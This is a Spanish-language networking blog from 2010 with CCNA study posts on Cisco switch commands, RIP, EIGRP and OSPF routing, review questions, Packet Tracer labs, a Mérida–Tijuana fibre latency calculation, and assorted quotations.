martes, 16 de noviembre de 2010

9a. Edición "Yo en AXTEL", Fibra Óptica Tecnología del futuro

miércoles, 10 de noviembre de 2010

Spanning Tree y VLAN

Presentaciones sobre Spanning Tree Protocol y las VLANs
---------- Forwarded message ----------


lunes, 8 de noviembre de 2010

Comandos para verificar el funcionamiento de un switch Catalyst

#show running-config
#show interfaces
#show interfaces Vlan 1
#show interfaces fa0/1
#show interfaces switchport
#show interfaces etherchannel
#show interfaces trunk
#show mac-address-table
#show spanning-tree (puede aplicarse a cada vlan)

martes, 2 de noviembre de 2010

Se termina el espacio IPv4 homologado

El organismo global a cargo de la asignación de direcciones IP espera que se terminen los bloques de IPv4 a principios del 2011, algo que ya se sabía desde hace años, con lo que crece la presión hacia los operadores para cambiar al sistema de direccionamiento IPv6.

Por ejemplo, la región para Asia Pacífico tiene 12 bloques libres de 16 millones de direcciones, esto es 1/256 del espacio total de direccionamiento.

Por lo que respecta a Axtel, empresa donde trabajo, ya tenemos soporte a IPv6 y sistemas autónomos de 4 bytes, con lo que estamos preparados para este nuevo cambio, que comenzaremos a operar en estándar en el 2011.

artículo relacionado

lunes, 23 de agosto de 2010

cita

We live in a society exquisitely dependent on science and technology, in which hardly anyone knows anything about science and technology.
Vivimos en una sociedad exquisitamente dependiente de la tecnología, en la cual difícilmente alguien sabe algo de ciencia y tecnología.
Carl Sagan

Review Questions EIGRP y OSPF

1. Your company is running IGRP using an AS of 10. You want to configure EIGRP on the network but want to migrate slowly to EIGRP and don’t want to configure redistribution. What command would allow you to migrate over time to EIGRP without configuring redistribution?
A. router eigrp 11
B. router eigrp 10
C. router eigrp 10 redistribute igrp
D. router igrp combine eigrp 10

2. Which EIGRP information is held in RAM and maintained through the use of Hello and update packets? (Choose two.)
A. Neighbor table
B. STP table
C. Topology table
D. DUAL table

3. Which of the following describe the process identifier that is used to run OSPF on a router?
(Choose two.)
A. It is locally significant.
B. It is globally significant.
C. It is needed to identify a unique instance of an OSPF database.
D. It is an optional parameter required only if multiple OSPF processes are running on the router.
E. All routes in the same OSPF area must have the same Process ID if they are to exchange routing information.

4. Where are EIGRP successor routes stored?
A. In the routing table only
B. In the neighbor table only
C. In the topology table only
D. In the routing table and neighbor table
E. In the routing table and the topology table
F. In the topology table and the neighbor table

5. Which command will display all the EIGRP feasible successor routes known to a router?
A. show ip routes *
B. show ip eigrp summary
C. show ip eigrp topology
D. show ip eigrp adjacencies
E. show ip eigrp neighbors detail

6. You get a call from a network administrator who tells you that he typed the following into his router:
Router(config)#router ospf 1
Router(config-router)#network 10.0.0.0 255.0.0.0 area 0
He tells you he still can’t see any routes in the routing table. What configuration error did the administrator make?
A. The wildcard mask is incorrect.
B. The OSPF area is wrong.
C. The OSPF Process ID is incorrect.
D. The AS configuration is wrong.

7. Which of the following protocols support VLSM, summarization, and discontiguous networking?
(Choose three.)
A. RIPv1
B. IGRP
C. EIGRP
D. OSPF
E. BGP
F. RIPv2

8. Which of the following are true regarding OSPF areas? (Choose three.)
A. You must have separate loopback interfaces configured in each area.
B. The numbers you can assign an area go up to 65,535.
C. The backbone area is also called area 0.
D. If your design is hierarchical, then you don’t need multiple areas.
E. All areas must connect to area 0.
F. If you have only one area, it must be called area 1.

9. Which of the following network types have a designated router and a backup designated router assigned? (Choose two.)
A. Broadcast
B. Point-to-point
C. NBMA
D. NBMA point-to-point
E. NBMA point-to-multipoint

10. A network administrator needs to configure a router with a distance-vector protocol that allows classless routing. Which of the following satisfies those requirements?
A. IGRP
B. OSPF
C. RIPv1
D. EIGRP
E. IS-IS

11. You need the IP address of the devices with which the router has established an adjacency.
Also, the retransmit interval and the queue counts for the adjacent routers need to be checked.
What command will display the required information?
A. show ip eigrp adjacency
B. show ip eigrp topology
C. show ip eigrp interfaces
D. show ip eigrp neighbors

12. For some reason, you cannot establish an adjacency relationship on a common Ethernet link between two routers. Looking at the output below, what is the cause of the problem?
RouterA#
Ethernet0/0 is up, line protocol is up
Internet Address 172.16.1.2/16, Area 0
Process ID 2, Router ID 172.126.1.1, Network Type BROADCAST, Cost: 10
Transmit Delay is 1 sec, State DR, Priority 1
Designated Router (ID) 172.16.1.2, interface address 172.16.1.1
No backup designated router on this network Timer intervals configured, Hello 5, Dead 20, Wait 20, Retransmit 5
RouterB#
Ethernet0/0 is up, line protocol is up
Internet Address 172.16.1.1/16, Area 0
Process ID 2, Router ID 172.126.1.1, Network Type BROADCAST, Cost: 10
Transmit Delay is 1 sec, State DR, Priority 1
Designated Router (ID) 172.16.1.1, interface address 172.16.1.2
No backup designated router on this network
Timer intervals configured, Hello 10, Dead 40, Wait 40, Retransmit 5

A. The OSPF area is not configured properly.
B. The priority on RouterA should be set higher.
C. The cost on RouterA should be set higher.
D. The Hello and Dead timers are not configured properly.
E. A backup designated router needs to be added to the network.
F. The OSPF Process ID numbers must match.

13. Which is true regarding EIGRP successor routes? (Choose two.)
A. A successor route is used by EIGRP to forward traffic to a destination.
B. Successor routes are saved in the topology table to be used if the primary route fails.
C. Successor routes are flagged as “active” in the routing table.
D. A successor route may be backed up by a feasible successor route.
E. Successor routes are stored in the neighbor table following the discovery process.

14. Which type of OSPF network will elect a backup designated router? (Choose two.)
A. Broadcast multi-access
B. Non-broadcast multi-access
C. Point-to-point
D. Broadcast multipoint

15. Which two of the following commands will place network 10.2.3.0/24 into area 0? (Choose two.)
A. router eigrp 10
B. router ospf 10
C. router rip
D. network 10.0.0.0
E. network 10.2.3.0 255.255.255.0 area 0
F. network 10.2.3.0 0.0.0.255 area0
G. network 10.2.3.0 0.0.0.255 area 0

16. With which network type will OSPF establish router adjacencies but not perform the DR/BDR
election process?
A. Point-to-point
B. Backbone area 0
C. Broadcast multi-access
D. Non-broadcast multi-access

17. What are three reasons for creating OSPF in a hierarchical design? (Choose three.)
A. To decrease routing overhead
B. To speed up convergence
C. To confine network instability to single areas of the network
D. To make configuring OSPF easier

18. What is the administrative distance of OSPF?
A. 90
B. 100
C. 110
D. 120

19. You have an internetwork as shown in the following illustration. However, the two networks are not sharing routing table route entries. Which command is needed to fix the problem?

A. version 2
B. no auto-summary
C. redistribute eigrp 10
D. default-information originate

20. If routers in a single area are configured with the same priority value, what value does a router use for the OSPF Router ID in the absence of a loopback interface?
A. The lowest IP address of any physical interface
B. The highest IP address of any physical interface
C. The lowest IP address of any logical interface
D. The highest IP address of any logical interface

Respuestas.

written lab de EIGRP y OSPF

  1. ¿Cuáles son los 4 protocolos ruteables soportados por EIGRP?
  2. ¿Cuándo es necesaria la redistribución en EIGRP?
  3. ¿Qué comando se usaría para activar EIGRP con un Sistema Autónomo de 300?
  4. ¿Qué comando le dice a EIGRP que está conectado a la red 172.10.0.0?
  5. ¿Qué tipo de interface de EIGRP no enviará o recibirá Hello Packets?
  6. Escriba el comando que activará el proceso 101 de OSPF en un router
  7. Escriba el comando que mostrará los detalles de todos los procesos de ruteo de OSPF
  8. Escriba el comando que mostrará información específica para una interface de OSPF
  9. Escriba el comando que mostrará todos los vecinos de OSPF
  10. Escriba el comando que mostrara todos los tipos de rutas que se conocen por OSPF en el router.

Respuestas.

domingo, 22 de agosto de 2010

Práctica de EIGRP y OSPF

En el capítulo 7 del Sybex para CCNA tenemos una práctica de laboratorio para EIGRP y OSPF que cubre la siguiente topología, y después un ejemplo de como se lleva a cabo la elección de un Designated Router cambiando las prioridades de los routers para forzar las decisiones hacia nuestro interés.


EIGRP y OSPF

Ejemplo en Packet Tracer.

Para la primera topología:

TABLa 7 . 5 Esquema de direccionamiento IP
router Interface IP address
A F0/0 172.16.10.1
B E0 172.16.10.2
B S0 172.16.20.1
C E0 172.16.30.1
C S0 172.16.20.2
C S1 172.16.40.1
D S0 172.16.40.2
D E0 172.16.50.1

martes, 17 de agosto de 2010

Open Shortest Path First

El protocolo OSPF es un estándar que funciona en muchos fabricantes y es una opción cuando se debe rutear entre routers que usan diferentes sistemas operativos y no IOS; se basa en anuncios de estado del enlace, sólo envía actualizaciones cuando dicho estado cambia. Además, está basado en un número de AS y un área, algo que no había en EIGRP; para participar del esquema de ruteo no sólo hay que estar en el mismo sistema autónomo, sino en la misma área.

A diferencia de EIGRP, aquí no hay autosumarización y debe ser manual, usamos wildcards en lugar de máscaras de red, y se comparte la información de ruteo sólo entre los routers de la misma área, y un router puede estar en distintas áreas, según configuremos el protocolo, y podemos configurar también procesos de ruteo independientes.

Los paquetes hello, como en EIGRP se envían a una dirección de multicast (224.0.0.5), y se va construyendo una tabla de vecinos y una topológica de la cual con el algritmo de Dijkstra se calcula ruta más corta a otra red.

Se envían anuncios del estado del enlace sólo a aquellos routers con los que se forma una adjacencia, y se nombra un Designated Router cuando se trata de una red de "broadcast" (ethernet usualmente), no así cuando es una red basada en Frame Relay por ejemplo.

El área es un grupo de redes y routers que comparten el mismo Area ID, y todos los routers en el área tienen la misma tabla de topología; los anuncios se envían y reciben sólo desde el Designated Router, lo cual disminuye las adjacencias y evita que se duplique o deforme la información de la red; además las áreas nos permiten tener un diseño jerárquico.

La distancia administrativa por default es:
  • Interface conectada 0
  • Ruta estática 1
  • EIGRP 90
  • IGRP 100
  • OSPF 110
  • RIP 120
  • External EIGRP 170
  • 255 para las rutas que no serán usadas.

OSPF asigna un costo, que Cisco calcula como 10^8/Bandwidth, así que un link de 64Kbps tiene un costo de 1563.

Para el ejemplo de ruteo usaremos la topología de EIGRP que teníamos ya hecha y hacemos algunos cambios en cada router:

Descarga el ejemplo para Packet Tracer aquí

desactivamos el EIGRP
Corp(config)#no router eigrp 10

activamos el OSPF
Corp(config)#router ospf 100
Corp(config-router)#network 10.1.0.0 0.0.255.255 area 0

Y para verificarlo podemos usar los siguientes comandos:

cita

"Las ciencias tienen las raíces amargas, pero muy dulces los frutos."
Aristóteles

martes, 8 de junio de 2010

Gestor de direcciones IP

Me encontré con esta herramienta gratuita que nos permite ver que direcciones de nuestra red o de un segmento particular están ocupadas, y cuando fueron vistas online por última vez:

IP Address Tracker

Espero que lo prueben y compartan los comentarios al respecto.

lunes, 31 de mayo de 2010

EIGRP (Enhanced Interior Gateway Routing Protocol) parte 1

El protocolo Enhanced Interior Gateway Routing Protocol híbrido, es decir, con características de un protocolo vector-distancia y de uno de estado del enlace; es propietario de Cisco, y podemos encontrar la descripción técnica en la página de Cisco.


EIGRP

Descarga esta topología aquí
EIGRP es un protocolo vector-distancia mejorado, classless, y que nos da una mejora sobre el protocolo IGRP. Usa el concepto de sistema autónomo (AS) para describir al conjunto de routers contiguos que ejecutan el mismo protocolo de ruteo y comparten información de ruteo. EIGRP incluye la ma´scara de red en sus anuncios de las rutas, a diferencia de IGRP, lo que nos permite usar VLSM y sumarizar las redes.

EIGRP es híbrido porque tiene características de los protocolos de link-state también, aunque no envía paquetes con el estado del enalce como OSPF, pero envía updates similares a los de protocolos link-state de las rutas, donde incluyen el costo desde la perspectiva del router que anuncia la ruta. También sincroniza las ablas de ruteo de los vecinos al arrancar y envía actualizaciones de cambios específicos cuando éstos ocurren; lo que hace a EIGRPuna solución óptima para redes grandes. Tiene un límite de saltos de 255 (el default es 100).

Otras de sus ventajas son:
  • Soporta IPv6.
  • Se considera classless, como RIPv2 y OSPF.
  • soporta VLSM y CIDR.
  • Soporta sumarización y redes discontiguas.
  • Descubrimiento eficiente de vecinos.
  • Se comunica con Reliable Transport Protocol.
También puede usar módulos dependientes del protocolo (PDM) para dar soporte de ruteo a protocolos como AppleTalk, IPv6, IPX, etc. Ésto se logra a través del uso de módulos (PDM) que manienten una serie de tablas de ruteo que aplican para un protocolo específico; es decir, tenemos una tabla de ruteo IP/EIGRP, una IPv6/EIGRP, una AppleTlak/EIGRP, etc. El único protocolo que se aproxima a ésto es Intermediate-System-to-Intermediate-System (IS-IS).

Para establecer un vecino (Neighbor) se deben cumplir 3 condiciones:
  • Recibir un Hello o un ACK
  • Que el número de AS coincida
  • Métricas idénticas (valores K)

Los protocolos de estado del enlace usan paquetes Hello para establecer lavecindad o adyacencia, porque no envían normalmente actualizaciones periódicas de rutas, y debe existir un mecanismo para ayudar a los vecinos a darse cuenta cuando un nuevo peer entra en juego o alguno existente se va "down". Para mantener la relación de vecindad, los routers de EIGRP deben continuar recibiendo esos paquetes Hello. De la topología mostrada podemos ver los paquetes Hello en HQ:

HQ#debug eigrp packets
EIGRP Packets debugging is on
(UPDATE, REQUEST, QUERY, REPLY, HELLO, ACK )
HQ#
EIGRP: Received HELLO on Serial0/0/1 nbr 10.1.3.2
AS 25, Flags 0x0, Seq 52/0 idbQ 0/0
EIGRP: Received HELLO on Serial0/1/1 nbr 10.1.5.2
AS 25, Flags 0x0, Seq 18/0 idbQ 0/0
EIGRP: Sending HELLO on Serial0/0/0
AS 25, Flags 0x0, Seq 25/0 idbQ 0/0 iidbQ un/rely 0/0
EIGRP: Sending HELLO on Serial0/0/1
AS 25, Flags 0x0, Seq 25/0 idbQ 0/0 iidbQ un/rely 0/0
EIGRP: Received HELLO on Serial0/1/0 nbr 10.1.4.2
AS 25, Flags 0x0, Seq 39/0 idbQ 0/0
EIGRP: Requeued unicast on Serial0/1/1
EIGRP: Received ACK on Serial0/1/0 nbr 10.1.4.2
AS 25, Flags 0x0, Seq 0/139 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
EIGRP: Sending UPDATE on Serial0/1/0 nbr 10.1.4.2
AS 25, Flags 0x0, Seq 141/97 idbQ 0/0 iidbQ un/rely 0/0
EIGRP: Received REPLY on Serial0/1/1 nbr 10.1.5.2
AS 25, Flags 0x0, Seq 18/144 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
EIGRP: Sending ACK on Serial0/1/1 nbr 10.1.5.2
AS 25, Flags 0x0, Seq 0/18 idbQ 0/0 iidbQ un/rely 0/0

Cuando los routers son de sistemas autónomos diferentes, no comparten su información de ruteo automáticamente y no se vuelven "vecinos"; ésto ayuda a que en redes grandes no se propaguen de manera indeseada ciertas rutas; aunque podemos hacer la redistribución manual entre diferentes AS.

EIGRP anuncia su tabla de ruteo entera sólo al encontrar un nuevo vecino y formar una nueva adyacencia mediante el intercambio de packetes Hello. Al recibir las actualizaciones, el router las guarda en una tabla de topología local, donde se guardan todas las rutas conocidas, y de ahí se seleccionan las mejores rutas que formarán la tabla de ruteo.

Algunos términos importantes:
  • Feasible Distance: la mejor métrica entre todas las rutas que conocemos a un destino, incluyendo la métrica al vecino que está anunciando esa ruta. Es la ruta que encontramos en la tabla de ruteo. La métrica es la que reporta el "vecino" más la métrica del vecino reportando la ruta. Es el primer número entre paréntesis.
  • Reported/advertised distance: es la distancia o métrica a una red remota, como la anuncia un vecino. Es también la métrica de la tabla de ruteo y es el segundo número de los dos que aparecen entre paréntesis:
HQ#show ip eigrp topology
IP-EIGRP Topology Table for AS 25

viernes, 21 de mayo de 2010

Mapas de Internet

Telegeography.com se dedica a elaborar mapas de telecomunicaciones, y tienen algunos muy interesantes:

Global Traffic Map - (muestra)

Submarine Cable Map -(muestra)
Global Internet Map -  (muestra)

IP-SLA

Me encontré este video que nos explica ¿qué es el IP-SLA?.

Está en inglés, pero vale la pena verlo.



cisco.com/go/ipsla

IP SLA Monitor

El IP SLA monitor es una herramienta para monitorer el performance de nuestra red WAN basados en la funcionalidad de IP-SLA. Es gratuito, y está hecho por Solar Winds; conviene que le den una revisada y experimenten un poco.

Free IP-SLA Monitor

Funciones:
Analiza el desempeño entre dispositivos que tienen activa la función de IP-SLA.
Monitorea operaciones comunes de IP-SLA, como UDP-echo, ICMP path echo, TCP connect time, Resolución DNS, respuesta de HTTP.
Crea y exporta un Universal Device Poller (UnDP) para monitorear el performance por trayectoria específica (usando el Orion Performance Monitor)
Verifica y monitorea la calidad de servicio (QoS)
Despliega el detalle de las operaciones IP-SLA, como frecuencia, origen, destino, tipo de operación, y tipo de servicio (ToS).
Previene la degradación del desempeño monitoreando los umbrales de operación para avisar visualmente cuando un problema ocurre.

domingo, 25 de abril de 2010

Cálculo de la latencia

Existen 3 factores en el cálculo de la latencia:
  1. Propagación de la señal
  2. Utilización de enlaces
  3. Tiempo de Serialización.
Propagación de la señal

Se refiere al tiempo que toma a una señal viajar de un punto A a un punto B, se puede considerar que la velocidad de una señal en una fibra óptica es de:
  • (1) v=d/t
  • (2) t = d / v
La velocidad teórica de la luz es C=300,000,000 m/s, la velocidad real está afectada por el índice de refracción del material en que se propaga, en este caso el de la  fibra es N=1.6:
  • (3) Velocidad real = C/1.6 = 187.5E8m/s
Tomando el ejemplo de las ciudades de Tijuana y Mérida las cuales representan los extremos del territorio nacional, la distancia entre estas ciudades a través de una red de FO la cual típicamente es siguiendo las carreteras entre las ciudades, y tocando las principales ciudades del territorio nacional. (no necesariamente el camino mas corto entre ambas ciudades).  La longitud de FO en la red entre esta ciudades es de 6587Km.

El tiempo de propagación para esta distancia es de :
  • 6,587,000 m / 187.5 E8 m/s = 0.03513 s
El round-trip es dos veces ese tiempo
  • Tiempo de propagación round trip Mérida – Tijuana = 70.26ms
Utilización de enlaces

Es el tiempo que le toma a un paquete de datos moverse a través de un enlace, en específico se refiere a los enlaces de acceso local. Este tiempo se calcula dividiendo la longitud en bits del paquete entre el ancho de banda del acceso.  Finalmente se multiplica por 4 ya que se considera round trip de una localidad a otra localidad.

Para el caso de un acceso a 64Kbps, se emplea una fragmentación bajo FRF .12 del paquete a 100bytes.
Con los datos anteriores tenemos:
  • 100bytes = 800bits
  • 800 bits / 64000 bits/seg = 0.0125 seg X 4 = 50mseg
Tiempo de serialización

Es el tiempo empleado por los equipos para el procesamiento de los paquetes, este tiempo es menor a los milisegundos y típicamente esta entre los 30 y 40 microsegundos , para este ejemplo tomaremos 35 microsegundos.

Las mejores practicas de diseño de una red de carrier indican tener al menos una capa de acceso y posteriormente una de Core, esto significa que un paquete tiene que pasar por lo menos por 4 equipos en su recorrido por la red , y si consideramos además los equipos CPE, se tendrían 6 equipos para una trayectoria en un sentido y 12 equipos considerando round trip.

De acuerdo a las consideraciones anteriores, el tiempo de serialización sería:

12 X 35 E-6 = 0.042 mseg como se podrá inferir este tiempo es despreciable del cálculo.

Latencia total calculada entre Mérida y Tijuana = 70.26ms + 50 ms =120.26 ms

La clase de servicio critica ( Conversacionales) es para tráfico de Voz sobre IP. De acuerdo a la recomendación de la ITUT G.114, el tiempo de latencia máximo en un sentido para estos servicios es de 150ms. ( 300ms round trip)

Para una mejor idea, un mapa de Mérida a Tijuana:


View Tijuana Mérida in a larger map

lunes, 19 de abril de 2010

cita

Technology is dominated by two types of people: those who understand what they do not manage, and those who manage what they do not understand.
La tecnología es dominada por dos tipos de personas: aquellos que entienden lo que no manejan, y aquellos que manejan lo que no entienden.
Archibald Putt (ley de Putt 1976)

Ejemplo de RIP (Packet Tracer)

En este ejemplo de Packet Tracer podemos ver una red corriendo RIP.
Hay que hacer un tracert desde una de las PC hacia otro host y cambiar la topología de la red apagando algunos routers o interfases, así veremos como la trayectoria hacia el destino es modificada.



más ejemplos

Routing Information Protocol (RIP)

RIP es un verdadero protocolo de vector-distancia; envía su tabla de ruteo completa por cada interfase activa cada 30 segundos, y sólo usa el número de saltos para determinar la mejor ruta hacia una red, con un conteo máximo de 15 saltos por default, declarando el destino inalcanzable al 16o. salto.

Trabaja bien en redes pequeñas, pero en redes grandes con enlaces WAN de anchos de banda pequeños es ineficiente.

RIP versión 1 usa sólo ruteo por clases (classful routing), es decir que todos los  dispositivos en la red deben usar la misma máscara de red; ésto se debe a que RIPv1 no envía las actualizaciones con las máscaras de red incluídas. RIP versión 2 tiene algo llamado prefijos de ruteo (prefix routing) y envía las máscaras de red en las actualizaciones de rutas. Éste si es classless routing.

RIP usa 4 contadores o timers para regular su desempeño:
  • Route update timer, es el contador que espera antes de enviar las actualizaciones de rutas, por default 30 segundos.
  • Route invalid timer, es el contador que lleva el tiempo que debe pasar antes de que un router determine que una ruta es inválida, 180 segundos por default. Se llegará a esta conclusión si no hay una actualización para esa ruta particular durante este periodo. Después de ese tiempo el router envía un anuncio a todos sus vecinos para que sepan que la ruta es inválida.
  • Holddown timer, es otro contadorde tiempo durante el cual se suprime la información de ruteo. Un router entra en un estado de holddown cuando una actualización nos indica que una ruta es inalcanzable. Este estado se mantiene hasta que una actualización nos avisa de una ruta con mejor métrica o hasta que expira el tiempo del holddown timer, que por default es de 180 segundos.
  • Route flush timer, fija el tiempo que pasa entre que se vuelve inválida una ruta y su retiro de la tabla de ruteo, por default son 240 segundos. Antes de quitarla de la tabla, el router les informa a los vecinos del retiro inminente de la ruta. El valor del contador Route invalid timer debe ser menor que el route flush timer para dar tiempo a que se anuncie entre los vecinos la actualización de la tabla de ruteo local.

cita

Los filósofos se han limitado a interpretar el mundo  de distintos modos; de lo que se trata es de transformarlo.
Karl Marx

Nadie que confía en sí, envidia la virtud del otro.
Marco Tulio Cicerón

Libros, caminos y días dan al hombre sabiduría."
Proverbio Árabe

Sólo una persona mediocre está siempre en su mejor momento."
William Somerset Maugham
Some men are born mediocre, some men achieve mediocrity, and some men have mediocrity thrust upon them.
Joseph Heller "Catch-22"

Oregano is the spice of life.
Henry J. Tillman

Good teaching is one-fourth preparation and three-fourths theater.
Gail Godwin

To see what is in front of one's nose needs a constant struggle.
George Orwell

Protocolos de Vector-Distancia

Como ya vimos, un protocolo como RIP basado en los saltos anuncia sus vecinos toda su tabla de ruteo, y no conoce de los anchos de banda o estado real de los enlaces en la red, así que, el siguiente escenario nos podría presentar un problema:
RIP

supongamos que hay una red más allá de nuestro router E a la que llamaremos T, a la cual lógicamente todos nuestros routers llegan por E; pero ese enlace falla y T es inalcanzable.

Como en RIP todos envían sus tablas de ruteo; A y B anunciarán que conocen la red remota T a través de C, y C anunciará que la conoce a través de D, mientras que D anunciará que la conoce por E, pero E anunciará que no está disponible. En ese momento D combinará su tabla con el anuncio, pero esperaremos al siguiente anuncio de rutas para que C sepa que no hay una ruta hacia T; y en el momento en que C reciba esa información, A hará el anuncio de que conoce una ruta hacia T a través de C, que le ha anunciado que no es alcanzable, pero que podría utilizar B para alcanzarla, por lo que ahora, todos conocerán a T a través de A que hizo un anuncio de ruta válida.

Esta situación es un loop de ruteo, caímos en una iteración infinita de resolución de una ruta. Para evitar ésto, RIP tiene un máximo de saltos, en este caso 15 saltos, después de lo cual declara el destino inalcanzable, es decir, declararemos que T está down luego de pasar por 15 routers en el proceso de búsqueda. Además, este conteo máximo de saltos nos ayuda a determinar cuanto nos toma declarar una ruta inválida o cuestionable.

Otra posible solución es el algoritmo Split-Horizon (horizonte dividido) , que reduce la información incorrecta y la carga de tráfico por información de ruteo al aplicar una regla simple: la información de ruteo no puede regresar por la dirección en que fue recibida. Es decir, el protocolo diferenciará por que interfase aprendió una ruta, y no anunciará la misma ruta por esa interfase, así evitaremos que el router A le envíe rutas a B que aprendió de B.

Otra manera de evitar las actualizaciones de rutas inconsistentes y evitar loops de ruteo es envenenar las rutas (Route Poisoning). Por ejemplo, cuando T se va down, el router E comienza a anunciar que la ruta hacia T es de 16 saltos (inalcanzable). Así evitamos que D y los demás subsecuentemente, anuncien una ruta inválida, y se asegura mediante el anuncio de una ruta Poison Reverse que D enviará a E, así sabremos que todos los routers del segmento conocen la ruta inalcanzable.

Un holddown es un tiempo de espera antes de enviar un anuncio regular de ruteo para una ruta que ha estado cambiando de estado (flapping); por ejemplo un enlace serial que pierde conectividad y regresa. Si no hay una manera de estabilizar dicho enlace la red no podrá converger y podría venirse abajo completa. Con el holddown nos aseguramos de que los cambios de estado no sean muy rápidos, dando tiempo para que la ruta afectada regrese o que la red se estabilice antes de volver a usar la ruta afectada. También es una manera de restringir a los routers por un espacio de tiempo los cambios que podrían afectar a rutas que se caban de retirar. Así evitamos que rutas no operativas se restablezcan en las tablas de otros routers.

Protocolos de Ruteo, las bases

Como ya vimos, el ruteo dinámico nos provee información de las redes que están conectadas en cada router de nuestra red, y está basado en distintos parámetros, como la distancia administrativa, el ancho de banda, el número de saltos, etc.

La distancia administrativa (AD) es usada para calificar la confianza que tenemos en la información de ruteo, siendo 0 lo mejor y 255 una ruta que nunca sería utilizada, por eso es que una red directamente conectada aparece en la tabla de ruteo con una AD de 0.

Cuando el router recibe dos anuncios de la misma red por rutas diferentes, lo primero que se revisará es la AD, y si una de las rutas tiene una AD menor, esa será colocada en la tabla de ruteo. En caso de que la AD de ambas sea igual, entonces se determinará la mejor ruta por el número de saltos o el ancho de banda de los enlaces; y si en ambas rutas las métricas son iguales, entonces el router usará ambas rutas, balanceando la carga entre ambas.

Las rutas directamente conectadas son las que tienen mayor prioridad, después las rutas estáticas, y luego las aprendidas por medio de un protocolo de ruteo (tabla de distancias administrativas). Cuando una tabla de ruteo contiene información de las rutas hacia cada una de las redes existentes, entonces se dice que alcanzamos la convergencia de la red.

Hay 3 clases de protocolos de ruteo:
  • Vector-Distancia (distance-vector), encuentran la mejor ruta a una red en base a la distancia. Cada vez que un paquete pasa por un router (los llamados saltos) la métrica hacia esa red se incrementa. La ruta con menos saltos hacia esa red es la mejor. El vector nos indica la dirección hacia la red remota. RIP e IGRP son protocolos de Vector-Distancia y envían la tabla de ruteo completa a los vecinos directamente conectados. Es importante notar que no toman en cuenta el ancho de banda, por lo que una ruta con menos saltos, pero un ancho de banda muy pequeño podría ser preferida sobre otra más "óptima"
  • Estado del Enlace (link state), o también llamados Protocolos de la ruta más corta primero (Open Shortest Path First), crean 3 tablas separadas; una de los vecinos directamente conectados, una que determina la topología de la red completa, y una última que es utilizada como tabla de ruteo. Estos protocolos dan más información de la red que un protocolo de Vector-Distancia. OSPF es un protocolo basado en Estado del Enlace y hace que un router envíe información de sus propios enlaces a otros routers en la red.
  • Protocolos híbridos, que son una mezcla de los protocolos Vector-Distancia y Estado del Enlace, por ejemplo EIGRP.
La decisión de que tipo de protocolo usar debe ser tomada en cada caso particular de acuerdo a las necesidades de cada red; pero conocer las ventajas y debilidades de cada protocolo nos ayudará a hacer una excelente decisión que cubra nuestras necesidades.

Ruteo

Un router se encarga de reenviar paquetes entre redes, eso se llama ruteo; sin embargo, por si solo conoce únicamente las redes directamente conectadas a él, no entiende de hosts, sólo de redes, y cuando un host conectado en una red que está en la interfase de un router tiene un paquete para una red desconocida, hace lo siguiente:

El host crea el paquete con la dirección IP de destino y de origen, pone la información que enviará y lo manda a su capa de enlace de datos, donde se coloca la dirección MAC de la tarjeta ethernet del host y la dirección MAC de nuestro Default Gateway, usualmente la interfase del router.

Esto ocurre porque las direcciones MAC son locales y no pueden salir de un dominio de broadcast, por eso, aunque la dirección de destino sea externa a nuestra red local, la MAC address utilizada para transportar ese frame es la del router. Cuando el router recibe el frame lo procesa y ve que la MAC address de destino es la de su interfase, por lo que quita la información capa 2 y procesa el contenido, un paquete IP, que tiene una dirección de destino que no es suya, y podría o no estar en una red que conoce el router.

El router procesa el paquete IP y revisa si conoce la red de destino en su tabla de ruteo, donde habrá una lista de rutas hacia las redes que conoce; Si el router conoce esa red como directamente conectada, crea un nuevo frame y cambia la MAC de origen por la de su interfase de salida, y pone la MAC de destino del host indicado; en caso de no conocerla directamente conectada, elabora el nuevo frame y lo manda a través de la intefase que está conectada en la dirección que la tabla de ruteo le indica, y hará un forward del paquete.

Podría ser el caso que no tenga una ruta espécifica para la red que busca, pero si hay una ruta de default o una red de default, el router entregará todo el tráfico cuya ruta es desconocida a esa ruta o red de default. En caso de no tener una ruta de default y de no concoer una ruta hacia el destino, el router crea un nuevo paquete IP, lo encapsula en un frame y lo reenvía de regreso por la interfase de donde llegó el paquete con la respuesta de "destino inalcanzable"

Ahora, es importante saber que hay dos tipos de protocolos, de ruteo y ruteables.
Generalmente usamos IP que es un protocolo ruteable, para encargarnos del direccionamiento entre las redes; y usamos BGP, OSFP, RIPv1 y RIPv2, IGRP, EIGRP, etc. como protocolos de ruteo.

Un protocolo de ruteo nos sirve para anunciar entre los distintos routers de la red las redes que cada quien conoce, y de esa manera construir rutas desde todos los puntos de la red hacia esas redes.

Hay 3 tipos de ruteo:
  • Ruteo Estático
  • Ruteo por Default
  • Ruteo Dinámico
En el ruteo estático, nosotros administramos las rutas y las escribimos directamente en cada router, lo que es tedioso y difícil de mantener cuando la red es de un tamaño considerable.

En el ruteo por default, podría o no haber rutas estáticas o dinámicas en mi tabla de ruteo, pero todo aquel destino desconocido será alcanzado a través de una ruta de salida por default; en el caso de RIP también se anuncian en la red las rutas por default.

En el ruteo dinámico, donde usamos los protocolos de ruteo, cada router anuncia las redes que conoce y les da una distancia administrativa y un costo, aunque no todos los protocolos asignan o usan las mismas variables.

En general, las distancias administrativas son tomadas por el router como en la tabla de nuestro post anterior, a menos que especifiquemos lo contrario; por ejemplo, podríamos configurar una ruta por default y darle una distancia adminsitrativa de 130, y luego configurar RIP, cuyas rutas tendrán un distancia administrativa de 120, siendo sus rutas utilizadas preferentemente sobre las rutas estáticas; sin embargo, si en determinado momento RIP no tiene una ruta hacia una red, nuestra ruta estática sería utilizada.
Ruteo

Podemos ver estos conceptos en las topologías de Packet Tracer que puedes descargar:
  • En el primer ejemplo tenemos la topología de 3 routers, cada uno con su LAN y con las interfases configuradas, pero sin ruteo, 
  • y en el segundo ejemplo tenemos la misma red, pero con rutas de default en los routers de los extremos y rutas estáticas en el central

sábado, 10 de abril de 2010

¿Cómo funciona el balanceo de carga?

El load balancing es una función del IOS, y está disponible en todas las plataformas de ruteo. Es parte del proceso de forwarding y se activa autmáticamente si la tabla de ruteo tiene trayectorias múltiples hacia el destino. Se basa en los protocolos estándar de ruteo, tales como RIP, RIPv2,EIGRP, IGRP, OSPF; o se deriva de las rutas estáticas y los mecanismos de reenvío de paquetes configurados. Le permite a un router usar múltiples caminos a un destino cuando reenvía paquetes.

Cuando un router conoce múltiples rutas a un destino por medio de procesos de ruteo, instala la ruta con la distancia administrativa más baja en la tabla de ruteo.
